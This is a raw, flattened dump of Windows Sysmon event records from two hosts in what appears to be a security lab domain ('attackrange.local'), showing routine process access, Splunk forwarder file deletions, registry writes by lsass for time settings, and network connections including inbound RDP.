10341000x80000000000000001049213Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049212Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049211Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049210Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049209Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049208Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049207Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049206Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049205Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049204Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049203Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049202Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.348{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43EF354A9B719957B77A50EEE48A1191,SHA256=A23921188F51E47A5390A13AD51CD873C620D1372881B37C0633CD2934E83660,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977824Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:57.056{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4304MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977827Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:58.493{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED759BE6D9D4F2A99C79995872BED9E0,SHA256=E5CEB907FFBE1CCEBA00FDEDFF280940F0BDBCB8E454A335A6254CDA2016ADC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049232Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:58.749{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BD1CAF5B18262FE1A2B00D7546A8FE5,SHA256=A64F755BD33B113D7881A1CEEA8D979F7542902728D9D1E5AF21AE03EA994C45,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977826Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:54.683{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59323-false10.0.1.12-8000- 13241300x8000000000000000977838Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:06:59.837{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000977837Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:06:59.837{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fc9c423) 13241300x8000000000000000977836Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:06:59.837{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b376-0xa557d912) 13241300x8000000000000000977835Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:06:59.837{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b37f-0x071c4112) 13241300x8000000000000000977834Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:06:59.837{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b387-0x68e0a912) 13241300x8000000000000000977833Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:06:59.837{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000977832Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:06:59.837{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fc9c423) 13241300x8000000000000000977831Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:06:59.837{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b376-0xa557d912) 13241300x8000000000000000977830Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:06:59.837{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b37f-0x071c4112) 13241300x8000000000000000977829Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:06:59.837{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b387-0x68e0a912) 23542300x8000000000000000977828Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:59.712{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6416EB346BBA9635FDF9E22EFA990CF,SHA256=412FFBE08637A11F515AAC8A0204EF56381492A62B9CC6BC87BCBE052E456B39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049233Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:59.766{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=621A57EDEF2064D72955BCD5B69D3603,SHA256=8893F00F8228205E9DF91BE53C8D04E6FBCFD8C9D45EA11D6270D6F7FCE184B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977839Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:00.915{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=590BE9354B9557357754604C0BF0DC87,SHA256=48BA62AF62C36B7CB7EABF0C3A8FB1DBFD64F61D51941FDCFF576E2A2F424030,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049235Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:00.800{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD56D5470962E01C8FB1B8BDEAA1128F,SHA256=0D08E29FE67B5D3EC81F38B415515FA6C50EB7A4785F284BA01F98349DB2DE17,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049234Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:58.878{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53290-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049237Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:01.831{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5F4BF0971AF9DAEDE11EE21A5DD7618,SHA256=7029D2F88BC46B70AA9CBCB83C19D93B117FB0CA040731A9AC73937540F4BBE7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049236Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:01.516{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049238Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:02.831{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95DFF4CDB6B6CDBA1A80981A6420DAA7,SHA256=365AFCFFC8C69B057A43AADB4FA59D1A64BE7400C5A79FFBD4DA70326862E501,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977840Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:02.071{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB29AA5A94A30AED77B33FC9EE0B9BBF,SHA256=103CBF071163CF3ABBCFA1584B0000B6221E77B39E83D428E51104DD8E270CB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049239Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:03.865{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C30220C385ED9B1EC453E74EB33DD4A0,SHA256=9A9E462ED137354B4E238A4F28DA231CCE52FC82CDE2D9F0AF59C6B4C57B04CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977844Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:03.779{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=57BF991731E67338C0304DCD9C25CBBA,SHA256=924D0B5F605F9E836111FDD13D794BEFA32193A5DD95F69BB93E17B141C0FF91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977843Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:03.779{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0DBDF5C89A30136971CB3B90E565FD8C,SHA256=A1872B69705663DC0527F80FE69BCFF9A50EE2D9D1BD731FB411DB216D6FD072,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977842Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:59.778{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59324-false10.0.1.12-8000- 23542300x8000000000000000977841Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:03.185{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78D47D087F186029D7F5C1ADC0B598DF,SHA256=2D1B1BC0DE80CAD6B4C9F503E21D492CFE94EC851D854EF57893315ED44D1BAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049243Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:04.900{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=718D7997CA44EF7E6D3B530CA7939744,SHA256=E24B81FEFCC689E88286481F0811B1F6FC45B643CB5BC20AA6D8B3CEE7693005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977845Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:04.216{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FB2C2EDCEF3D40ED805D95E57D671BA,SHA256=25D07A4019362C254E9B638835FB3C164358D232A343931C2E03B1B3E95B4D1F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049242Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:02.819{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51862-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049241Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:04.467{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C985B93452B41FE7F72505351C01564,SHA256=BC5CC025DFF70027A051697BC7FF97FC32F069B2A536AD741D38AFCD944E8F5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049240Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:04.466{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3896828F79CFE12E3DCC14438585EA17,SHA256=B978C50659198D24DDC260120FFC479357F79532CBB032FB883D96898DDBA708,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049244Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:05.900{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26769FCBE55146FB2AC1E32BC3CB4BA5,SHA256=8D9726E77182651E71D3D4579F3CE5FD7DBF2763F12EAB0A18FC71AC1863ADE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977847Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:05.451{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA7771AAB63305060FE694366F57566B,SHA256=627F0969784ADDE3026689987408CE24BDCD2CE2BC0B0387EB4D43FC7629BC0E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977846Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:01.094{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-58225-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001049247Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:06.915{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0920E8F51920296CE3ED59CAB925FAE9,SHA256=9113471B5B4C9746DF56DF519F5DB84EC79250F3CBC23D1D92783D178375F74E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977848Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:06.466{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 